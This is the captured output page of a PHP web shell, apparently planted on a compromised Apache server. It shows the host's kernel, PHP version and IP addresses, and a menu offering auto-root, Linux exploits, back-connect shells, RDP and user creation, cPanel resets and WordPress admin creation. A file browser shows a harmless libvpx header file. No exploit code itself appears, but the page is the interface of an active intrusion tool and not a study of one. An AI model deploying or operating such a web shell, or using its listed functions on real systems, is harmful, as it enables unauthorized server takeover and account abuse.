Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
vpx /
[ HOME SHELL ]
Name
Size
Permission
Action
svc_context.h
4.03
KB
-rw-r--r--
vp8.h
4.99
KB
-rw-r--r--
vp8cx.h
11.72
KB
-rw-r--r--
vp8dx.h
3.13
KB
-rw-r--r--
vpx_codec.h
19.13
KB
-rw-r--r--
vpx_decoder.h
13.78
KB
-rw-r--r--
vpx_encoder.h
36.07
KB
-rw-r--r--
vpx_image.h
10.46
KB
-rw-r--r--
vpx_integer.h
1.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vpx_integer.h
/* * Copyright (c) 2010 The WebM project authors. All Rights Reserved. * * Use of this source code is governed by a BSD-style license * that can be found in the LICENSE file in the root of the source * tree. An additional intellectual property rights grant can be found * in the file PATENTS. All contributing project authors may * be found in the AUTHORS file in the root of the source tree. */ #ifndef VPX_INTEGER_H #define VPX_INTEGER_H /* get ptrdiff_t, size_t, wchar_t, NULL */ #include <stddef.h> #if (defined(_MSC_VER) && (_MSC_VER < 1600)) || defined(VPX_EMULATE_INTTYPES) typedef signed char int8_t; typedef signed short int16_t; typedef signed int int32_t; typedef unsigned char uint8_t; typedef unsigned short uint16_t; typedef unsigned int uint32_t; #if (defined(_MSC_VER) && (_MSC_VER < 1600)) typedef signed __int64 int64_t; typedef unsigned __int64 uint64_t; #define INT64_MAX _I64_MAX #define INT16_MAX _I16_MAX #define INT16_MIN _I16_MIN #endif #ifndef _UINTPTR_T_DEFINED typedef size_t uintptr_t; #endif #else /* Most platforms have the C99 standard integer types. */ #if defined(__cplusplus) && !defined(__STDC_FORMAT_MACROS) #define __STDC_FORMAT_MACROS #endif #include <stdint.h> #endif /* VS2010 defines stdint.h, but not inttypes.h */ #if defined(_MSC_VER) #define PRId64 "I64d" #else #include <inttypes.h> #endif #endif
Close